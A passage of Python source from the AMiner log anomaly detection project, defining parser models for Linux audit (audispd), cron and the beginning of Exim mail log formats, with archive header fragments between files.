DecimalIntegerValueModelElement("ses-old"), FixedWordlistDataModelElement("s6", [b" new ses=", ses]), DecimalIntegerValueModelElement("ses-new"), OptionalMatchModelElement("optional_result", SequenceModelElement("result_seq", [ FixedDataModelElement("s7", res), DecimalIntegerValueModelElement("result") ])) ]), "MAC_CIPSOV4_ADD": AnyByteDataModelElement("mac_cipsov4_add"), "MAC_CIPSOV4_DEL": AnyByteDataModelElement("mac_cipsov4_del"), "MAC_CONFIG_CHANGE": AnyByteDataModelElement("mac_config_change"), "MAC_IPSEC_EVENT": AnyByteDataModelElement("mac_ipsec_event"), "MAC_MAP_ADD": AnyByteDataModelElement("mac_map_add"), "MAC_MAP_DEL": AnyByteDataModelElement("mac_map_del"), "MAC_POLICY_LOAD": AnyByteDataModelElement("mac_policy_load"), "MAC_STATUS": SequenceModelElement("mac_status", [ FixedDataModelElement("s0", b" enforcing="), DecimalIntegerValueModelElement("enforcing"), FixedDataModelElement("s1", b" old_enforcing="), DecimalIntegerValueModelElement("old_enforcing"), FixedDataModelElement("s2", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses") ]), "MAC_UNLBL_ALLOW": AnyByteDataModelElement("mac_unlbl_allow"), "MAC_UNLBL_STCADD": AnyByteDataModelElement("mac_unlbl_stcadd"), "MAC_UNLBL_STCDEL": AnyByteDataModelElement("mac_unlbl_stcdel"), "MMAP": AnyByteDataModelElement("mmap"), "MQ_GETSETATTR": AnyByteDataModelElement("mq_getsetattr"), "MQ_NOTIFY": AnyByteDataModelElement("mq_notify"), "MQ_OPEN": AnyByteDataModelElement("mq_open"), "MQ_SENDRECV": AnyByteDataModelElement("mq_sendrecv"), "NETFILTER_CFG": SequenceModelElement("netfilter_cfg", [ FixedDataModelElement("s0", b" table="), FixedWordlistDataModelElement("table", [b"filter", b"mangle", b"nat"]), FixedDataModelElement("s1", b" family="), DecimalIntegerValueModelElement("family"), FixedDataModelElement("s2", b" entries="), DecimalIntegerValueModelElement("entries") ]), "NETFILTER_PKT": SequenceModelElement("netfilter_pkt", [ FixedDataModelElement("s0", b" mark=0x"), HexStringModelElement("mark"), FixedDataModelElement("s1", b" saddr="), FirstMatchModelElement("saddr", [ IpAddressDataModelElement("ipv4"), IpAddressDataModelElement("ipv6", ipv6=True), ]), FixedDataModelElement("s2", b" daddr="), FirstMatchModelElement("daddr", [ IpAddressDataModelElement("ipv4"), IpAddressDataModelElement("ipv6", ipv6=True), ]), FixedDataModelElement("s3", b" proto="), DecimalIntegerValueModelElement("proto") ]), "OBJ_PID": SequenceModelElement("objpid", [ FixedDataModelElement("s0", b" opid="), DecimalIntegerValueModelElement("opid"), FixedDataModelElement("s1", b" oauid="), DecimalIntegerValueModelElement("oauid", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s2", b" ouid="), DecimalIntegerValueModelElement("ouid"), FixedDataModelElement("s3", b" oses="), DecimalIntegerValueModelElement("oses", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s4", b" obj="), DelimitedDataModelElement("obj", b" "), FixedDataModelElement("s4", b" ocomm="), ExecArgumentDataModelElement("ocomm") ]), "PATH": SequenceModelElement("path", [ FixedDataModelElement("s0", b" item="), DecimalIntegerValueModelElement("item"), FixedDataModelElement("s1", b" name="), ExecArgumentDataModelElement("name"), FirstMatchModelElement("fsinfo", [ SequenceModelElement("inodeinfo", [ FixedDataModelElement("s0", b" inode="), DecimalIntegerValueModelElement("inode"), FixedDataModelElement("s1", dev), # A special major/minor device element could be better here. VariableByteDataModelElement("dev", b"0123456789abcdef:"), FixedDataModelElement("s2", b" mode="), # is octal DecimalIntegerValueModelElement("mode", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("s3", b" ouid="), DecimalIntegerValueModelElement("ouid"), FixedDataModelElement("s4", b" ogid="), DecimalIntegerValueModelElement("ogid"), FixedDataModelElement("s5", b" rdev="), # A special major/minor device element could be better here (see above). VariableByteDataModelElement("rdev", b"0123456789abcdef:"), FixedDataModelElement("s6", b" nametype=") ]), FixedDataModelElement("noinfo", b" nametype=")]), FixedWordlistDataModelElement("nametype", [b"CREATE", b"DELETE", b"NORMAL", b"PARENT", b"UNKNOWN"]) ]), "PROCTITLE": SequenceModelElement("proctitle", [ FixedDataModelElement("s0", b" proctitle="), ExecArgumentDataModelElement("proctitle")]), "RESP_ACCT_LOCK": AnyByteDataModelElement("resp_acct_lock"), "RESP_ACCT_LOCK_TIMED": AnyByteDataModelElement("resp_acct_lock_timed"), "RESP_ACCT_REMOTE": AnyByteDataModelElement("resp_acct_remote"), "RESP_ACCT_UNLOCK_TIMED": AnyByteDataModelElement("resp_acct_unlock_timed"), "RESP_ALERT": AnyByteDataModelElement("resp_alert"), "RESP_ANOMALY": AnyByteDataModelElement("resp_anomaly"), "RESP_EXEC": AnyByteDataModelElement("resp_exec"), "RESP_HALT": AnyByteDataModelElement("resp_halt"), "RESP_KILL_PROC": AnyByteDataModelElement("resp_kill_proc"), "RESP_SEBOOL": AnyByteDataModelElement("resp_sebool"), "RESP_SINGLE": AnyByteDataModelElement("resp_single"), "RESP_TERM_ACCESS": AnyByteDataModelElement("resp_term_access"), "RESP_TERM_LOCK": AnyByteDataModelElement("resp_term_lock"), "ROLE_ASSIGN": AnyByteDataModelElement("role_assign"), "ROLE_MODIFY": AnyByteDataModelElement("role_modify"), "ROLE_REMOVE": AnyByteDataModelElement("role_remove"), "SELINUX_ERR": SequenceModelElement("service_err", [ FixedDataModelElement("s0", b" op="), DelimitedDataModelElement("op", b" "), FixedDataModelElement("s1", reason), DelimitedDataModelElement("reason", b" "), FixedDataModelElement("s2", b" scontext="), DelimitedDataModelElement("scontext", b" "), FixedDataModelElement("s3", b" tcontext="), DelimitedDataModelElement("tcontext", b" "), FixedDataModelElement("s4", b" tclass="), DelimitedDataModelElement("tclass", b" "), FixedDataModelElement("s5", b" perms="), VariableByteDataModelElement("perms", perms_alphabet) ]), "SERVICE_START": SequenceModelElement("service", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b" msg='"), OptionalMatchModelElement("optional_msg", DelimitedDataModelElement("msg", b" ")), FixedDataModelElement("s5", b' comm="'), DelimitedDataModelElement("comm", b'"'), FixedDataModelElement("s5", b'" exe="'), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'") ]), "SOCKADDR": SequenceModelElement("sockaddr", [ FixedDataModelElement("s0", b" saddr="), HexStringModelElement("sockaddr", upper_case=True) ]), "SOCKETCALL": SequenceModelElement("socketcall", [ FixedDataModelElement("s0", b" nargs="), DecimalIntegerValueModelElement("nargs"), RepeatedElementDataModelElement("args", SequenceModelElement("arg", [ FixedDataModelElement("s1", b" a"), DecimalIntegerValueModelElement("arg_num"), FixedDataModelElement("s2", b"="), DecimalIntegerValueModelElement("arg"), ])) ]), "SYSCALL": SequenceModelElement("syscall", [ FixedDataModelElement("s0", b" arch="), HexStringModelElement("arch"), FixedDataModelElement("s1", b" syscall="), DecimalIntegerValueModelElement("syscall"), OptionalMatchModelElement( "personality", SequenceModelElement("pseq", [ FixedDataModelElement("s0", b" per="), DecimalIntegerValueModelElement("personality") ])), OptionalMatchModelElement("result", SequenceModelElement("rseq", [ FixedDataModelElement("s2", b" success="), FixedWordlistDataModelElement("succes", [b"no", b"yes"]), FixedDataModelElement("s3", b" exit="), DecimalIntegerValueModelElement("exit", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL) ])), FixedDataModelElement("s4", b" a0="), HexStringModelElement("arg0"), FixedDataModelElement("s5", b" a1="), HexStringModelElement("arg1"), FixedDataModelElement("s6", b" a2="), HexStringModelElement("arg2"), FixedDataModelElement("s7", b" a3="), HexStringModelElement("arg3"), FixedDataModelElement("s8", b" items="), DecimalIntegerValueModelElement("items"), FixedDataModelElement("s9", b" ppid="), DecimalIntegerValueModelElement("ppid"), FixedDataModelElement("s10", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s11", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s12", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s13", gid), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("s14", b" euid="), DecimalIntegerValueModelElement("euid"), FixedDataModelElement("s15", b" suid="), DecimalIntegerValueModelElement("suid"), FixedDataModelElement("s16", b" fsuid="), DecimalIntegerValueModelElement("fsuid"), FixedDataModelElement("s17", b" egid="), DecimalIntegerValueModelElement("egid"), FixedDataModelElement("s18", b" sgid="), DecimalIntegerValueModelElement("sgid"), FixedDataModelElement("s19", b" fsgid="), DecimalIntegerValueModelElement("fsgid"), FixedDataModelElement("s20", b" tty="), DelimitedDataModelElement("tty", b" "), FixedDataModelElement("s21", ses), DecimalIntegerValueModelElement("sesid"), FixedDataModelElement("s22", comm), ExecArgumentDataModelElement("command"), FixedDataModelElement("s23", exe), DelimitedDataModelElement("executable", b'"'), FixedDataModelElement("s24", b'" key='), AnyByteDataModelElement("key") ]), "SYSTEM_BOOT": AnyByteDataModelElement("system_boot"), "SYSTEM_RUNLEVEL": AnyByteDataModelElement("system_runlevel"), "SYSTEM_SHUTDOWN": AnyByteDataModelElement("system_shutdown"), "TRUSTED_APP": AnyByteDataModelElement("trusted_app"), "TTY": AnyByteDataModelElement("tty"), # The UNKNOWN type is used then audispd does not know the type of the event, usually because the kernel is more recent than audispd, # thus emiting yet unknown event types. # * type=1327: procitle: see https://www.redhat.com/archives/linux-audit/2014-February/msg00047.html "UNKNOWN[1327]": SequenceModelElement("unknown-proctitle", [ FixedDataModelElement("s0", b" proctitle="), ExecArgumentDataModelElement("proctitle") ]), "USER_ACCT": SequenceModelElement("useracct", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:accounting acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b")'") ]), "USER_AUTH": SequenceModelElement("userauth", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:authentication acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'") ]), "USER_AVC": AnyByteDataModelElement("user_avc"), "USER_CHAUTHTOK": AnyByteDataModelElement("user_chauthtok"), "USER_CMD": SequenceModelElement("user_cmd", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b" msg='"), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s4", b' cmd="'), DelimitedDataModelElement("cmd", b'"'), FixedDataModelElement("s5", b"\" (terminal=pts/0"), FixedDataModelElement("s6", res), pam_status_word_list, FixedDataModelElement("s7", b")'"), ]), "USER_END": SequenceModelElement("userend", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s4", b' msg=\'PAM: session close acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", b'" :' + exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b")'"), ]), "USER_ERR": SequenceModelElement("usererr", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b' msg=\'PAM: bad_ident acct=? : exe="'), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s4", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s5", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s6", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s7", res), pam_status_word_list, FixedDataModelElement("s8", b")'") ]), "USER_LABELED_EXPORT": AnyByteDataModelElement("user_labeled_export"), "USER_LOGIN": SequenceModelElement("userlogin", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b" msg='acct=\""), DelimitedDataModelElement("acct", b'"'), FixedDataModelElement("s4", b'":' + exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s5", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s6", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s7", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s8", res), pam_status_word_list, FixedDataModelElement("s9", b")'") ]), "USER_LOGOUT": AnyByteDataModelElement("user_logout"), "USER_MAC_POLICY_LOAD": AnyByteDataModelElement("user_mac_policy_load"), "USER_MGMT": AnyByteDataModelElement("user_mgmt"), "USER_ROLE_CHANGE": SequenceModelElement("user_role_change", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s4", b" msg='pam: "), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s5", b" selected-context="), DelimitedDataModelElement("selected_context", b" "), FixedDataModelElement("s6", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s7", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s8", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s9", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s10", res), pam_status_word_list, FixedDataModelElement("s11", b")'") ]), "USER_SELINUX_ERR": AnyByteDataModelElement("user_selinux_err"), "USER_START": SequenceModelElement("userstart", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b' msg=\'PAM: session open acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s4", b'" :' + exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s5", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s6", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s7", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s8", res), pam_status_word_list, FixedDataModelElement("s9", b")'"), ]), "USER_TTY": AnyByteDataModelElement("user_tty"), "USER_UNLABELED_EXPORT": AnyByteDataModelElement("user_unlabeled_export"), "USYS_CONFIG": AnyByteDataModelElement("usys_config"), "VIRT_CONTROL": AnyByteDataModelElement("virt_control"), "VIRT_MACHINE_ID": AnyByteDataModelElement("virt_machine_id"), "VIRT_RESOURCE": AnyByteDataModelElement("virt_resource") } type_branches["SERVICE_STOP"] = type_branches["SERVICE_START"] model = SequenceModelElement("audispd", [ OptionalMatchModelElement("optional", FirstMatchModelElement("type", [ FixedDataModelElement("sname", b"audispd: "), FixedDataModelElement("sname_remote", b"audisp-remote: "), ])), FirstMatchModelElement("msg", [ ElementValueBranchModelElement("record", SequenceModelElement("preamble", [ FixedDataModelElement("s0", b"type="), WhiteSpaceLimitedDataModelElement("type"), FixedDataModelElement("s1", b" msg=audit("), DecimalIntegerValueModelElement("time"), FixedDataModelElement("s0", b"."), DecimalIntegerValueModelElement("ms", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("s1", b":"), DecimalIntegerValueModelElement("seq"), FixedDataModelElement("s2", b"):") ]), "type", type_branches, default_branch=None), FixedDataModelElement("queue-full", b"queue is full - dropping event") ]) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/CronParsingModel.py000066400000000000000000000046311437606560100322650ustar00rootroot00000000000000"""This module defines a parser for cron.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(user_name_model=None): """Return a model to parse a cron message logged via syslog after any standard logging preamble, e.g. from syslog.""" if user_name_model is None: user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz.-") type_children = [ SequenceModelElement("exec", [ FixedDataModelElement("s0", b"("), user_name_model, FixedDataModelElement("s1", b") CMD "), AnyByteDataModelElement("command") ]), SequenceModelElement("pam", [ FixedDataModelElement("s0", b"pam_unix(cron:session): session "), FixedWordlistDataModelElement("change", [b"opened", b"closed"]), FixedDataModelElement("s1", b" for user "), user_name_model, OptionalMatchModelElement("openby", FixedDataModelElement("default", b" by (uid=0)")) ]) ] model = FirstMatchModelElement("cron", [ SequenceModelElement("std", [ FixedDataModelElement("sname", b"CRON["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msgtype", type_children) ]), SequenceModelElement("low", [ FixedDataModelElement("sname", b"cron["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: (*system*"), DelimitedDataModelElement("rname", b") RELOAD ("), FixedDataModelElement("s1", b") RELOAD ("), DelimitedDataModelElement("fname", b")"), FixedDataModelElement("s2", b")"), ]) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/EximGenericParsingModel.py000066400000000000000000001140051437606560100335600ustar00rootroot00000000000000"""This module defines a generic parser model for exim.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement def get_model(): """Return a model to parse Exim logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" size_str = b" SIZE=" host_str1 = b" host " host_str = b":" + host_str1 status_code421 = b": 421" status_code450 = b": 450 " status_code451 = b": 451 " status_code452 = b": 452 <" status_code550 = b": 550" status_code553 = b": 553 " status_code554 = b": 554 " dtme = DateTimeModelElement("time", b"%Y-%m-%d %H:%M:%S") msg_id = DelimitedDataModelElement("id", b" ") ip = IpAddressDataModelElement("ip") host_ip = IpAddressDataModelElement("host_ip") host = DelimitedDataModelElement("host", b" ") size = DecimalIntegerValueModelElement("size") port = DecimalIntegerValueModelElement("port") h_str = b" H=" h_str1 = b"H=" r_str = b" R=" t_str = b" T=" f_str = b" F=<" a_str = b" A=" u_str = b" U=" p_str = b" P=" s_str = b" S=" x_str = b" X=" c_str = b" C=\"" id_str = b" id=" a = DelimitedDataModelElement("a", b" ") r = DelimitedDataModelElement("r", b" ") t = DelimitedDataModelElement("t", b" ") u = DelimitedDataModelElement("u", b" ") p = DelimitedDataModelElement("p", b" ") h = DelimitedDataModelElement("h", b" ") x = DelimitedDataModelElement("x", b" ") c = DelimitedDataModelElement("c", b'"') s = DecimalIntegerValueModelElement("s") mail_from = DelimitedDataModelElement("mail_from", b" ") smtp_error_from_remote = b"SMTP error from remote mail server after MAIL FROM:<" model = FirstMatchModelElement("model", [ SequenceModelElement("date_seq", [ dtme, FixedDataModelElement("sp", b" "), FirstMatchModelElement("fm", [ SequenceModelElement("start", [ FixedDataModelElement("start", b"Start queue run: pid="), DecimalIntegerValueModelElement("pid"), ]), SequenceModelElement("end", [ FixedDataModelElement("end", b"End queue run: pid="), DecimalIntegerValueModelElement("pid"), ]), SequenceModelElement("no_host_found", [ FixedDataModelElement("no_host_found_str", b"no host name found for IP address "), ip, ]), SequenceModelElement("vrfy_failed", [ FixedDataModelElement("vrfy_failed_str", b"VRFY failed for "), DelimitedDataModelElement("mail", b" "), FixedDataModelElement("h_str", h_str), h, FixedDataModelElement("sp1", b" ["), ip, FixedDataModelElement("sp2", b"]") ]), SequenceModelElement("deferred", [ msg_id, FixedDataModelElement("smtp_error", b" SMTP error from remote mail server after MAIL FROM:<"), DelimitedDataModelElement("from_mail", b">"), FixedDataModelElement("s0", b">" + size_str), size, FixedDataModelElement("s1", host_str), host, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code421 + b" "), # status code has always to be 421 in this error. DelimitedDataModelElement("version", b" "), FixedDataModelElement("s3", b" ["), DelimitedDataModelElement("domain", b"]"), FirstMatchModelElement("status", [ SequenceModelElement("temporary", [ FixedDataModelElement("s4", b"] Message from ("), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s5", b") temporarily deferred - "), DelimitedDataModelElement("reason_code", b" "), FixedDataModelElement("s6", b" Please refer to "), VariableByteDataModelElement("refer_addr", alphabet) ]), SequenceModelElement("permanent", [ FixedDataModelElement("s4", b"] All messages from "), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s5", b" will be permanently deferred; Retrying will NOT succeed. See "), VariableByteDataModelElement("refer_addr", alphabet) ]) ]), ]), SequenceModelElement("temporary_deferred_new", [ msg_id, FixedDataModelElement("s0", h_str), host, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("s2", b"]:"), FixedDataModelElement("smtp_error", b" SMTP error from remote mail server after pipelined MAIL FROM:<"), DelimitedDataModelElement("from_mail", b">"), FixedDataModelElement("s3", b">" + size_str), size, FixedDataModelElement("status_code", status_code421 + b" "), # status code has to be 421 in this error message. DelimitedDataModelElement("version", b" "), FixedDataModelElement("s4", b" ["), DelimitedDataModelElement("domain", b"]"), FixedDataModelElement("s5", b"] Messages from "), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s6", b" temporarily deferred due to unexpected volume or user complaints - "), DelimitedDataModelElement("reason_code", b" "), FixedDataModelElement("s7", b" see "), VariableByteDataModelElement("refer_addr", alphabet) ]), SequenceModelElement("rate_limited", [ msg_id, FixedDataModelElement("smtp_error", b" SMTP error from remote mail server after end of data" + host_str), host, FixedDataModelElement("s0", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code421 + b"-"), # status code has to be 421 in this error message. DelimitedDataModelElement("version", b" "), FixedDataModelElement("s1", b" ["), IpAddressDataModelElement("ip"), FixedDataModelElement("s2", b" "), DecimalIntegerValueModelElement("number"), FixedDataModelElement("msg", b"] Our system has detected an unusual rate of\\n421-"), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" unsolicited mail originating from your IP address. To protect our\\n421-"), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" users from spam, mail sent from your IP address has been temporarily\\n421-"), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" rate limited. Please visit\\n421-"), DelimitedDataModelElement("version", b" ", consume_delimiter=True), DelimitedDataModelElement("website", b" "), FixedDataModelElement("msg", b" to review our Bulk\\n421 "), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" Email Senders Guidelines. "), msg_id, FixedDataModelElement("gsmtp", b" - gsmtp") ]), SequenceModelElement("service_unavailable", [ msg_id, FixedDataModelElement("msg", b" SMTP error from remote mail server after RCPT TO:<"), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("s0", b">" + host_str), host, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code450), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" Service unavailable") ]), SequenceModelElement("host_unable_to_send", [ msg_id, FixedDataModelElement("s0", b" == "), DelimitedDataModelElement("from_mail", b" "), FixedDataModelElement("s1", r_str), r, FixedDataModelElement("s2", t_str), t, FixedDataModelElement("msg", b" defer (-44): SMTP error from remote mail server after RCPT TO:<"), DelimitedDataModelElement("to_mail", b">"), FixedDataModelElement("s3", b">" + host_str), host, FixedDataModelElement("s4", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code451), FixedDataModelElement("msg", b"Temporary local problem - please try later") ]), SequenceModelElement("uncomplete_sender_verify", [ FixedDataModelElement("s0", h_str1), h, FixedDataModelElement("s1", b" ("), DelimitedDataModelElement("domain", b")"), FixedDataModelElement("s2", b") ["), IpAddressDataModelElement("ipv6", ipv6=True), FixedDataModelElement("s3", b"]:"), port, FirstMatchModelElement("reason", [ SequenceModelElement("permission_denied", [ FixedDataModelElement("msg", b" sender verify defer for <"), DelimitedDataModelElement("from_mail", b">"), FixedDataModelElement("msg", b">: require_files: error for "), DelimitedDataModelElement("required_file", b":"), FixedDataModelElement("msg", b": Permission denied") ]), SequenceModelElement("rejected_rcpt", [ FixedDataModelElement("s0", f_str), DelimitedDataModelElement("from", b">"), FixedDataModelElement("s1", b">" + a_str), DelimitedDataModelElement("a", b" "), FixedDataModelElement("msg", b" temporarily rejected RCPT <"), DelimitedDataModelElement("rcpt", b">"), FixedDataModelElement("msg", b">: Could not complete sender verify") ]) ]) ]), SequenceModelElement("domain_size_limit_exceeded", [ msg_id, FixedDataModelElement("s0", b" =="), DelimitedDataModelElement("mail_to", b" "), FixedDataModelElement("s1", r_str), r, FixedDataModelElement("s2", t_str), t, FixedDataModelElement("msg", b" defer (-44): SMTP error from remote mail server after RCPT TO:<"), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("s3", b">" + host_str), host, FixedDataModelElement("s4", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code452), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("msg", b"> Domain size limit exceeded") ]), SequenceModelElement("verification_error", [ msg_id, FixedDataModelElement("s0", b" ** "), DelimitedDataModelElement("mail_to", b" "), FixedDataModelElement("s1", r_str), r, FixedDataModelElement("s2", t_str), DelimitedDataModelElement("t", b":"), FirstMatchModelElement("fm", [ SequenceModelElement("verification_failed", [ FixedDataModelElement("msg", b": SMTP error from remote mail server after RCPT TO:<"), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("s3", b">" + host_str), host, FixedDataModelElement("s4", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code550), FixedDataModelElement("msg", b"-Verification for <"), DelimitedDataModelElement("mail_from", b">"), FixedDataModelElement("msg", b">\\n550-The mail server could not deliver mail to 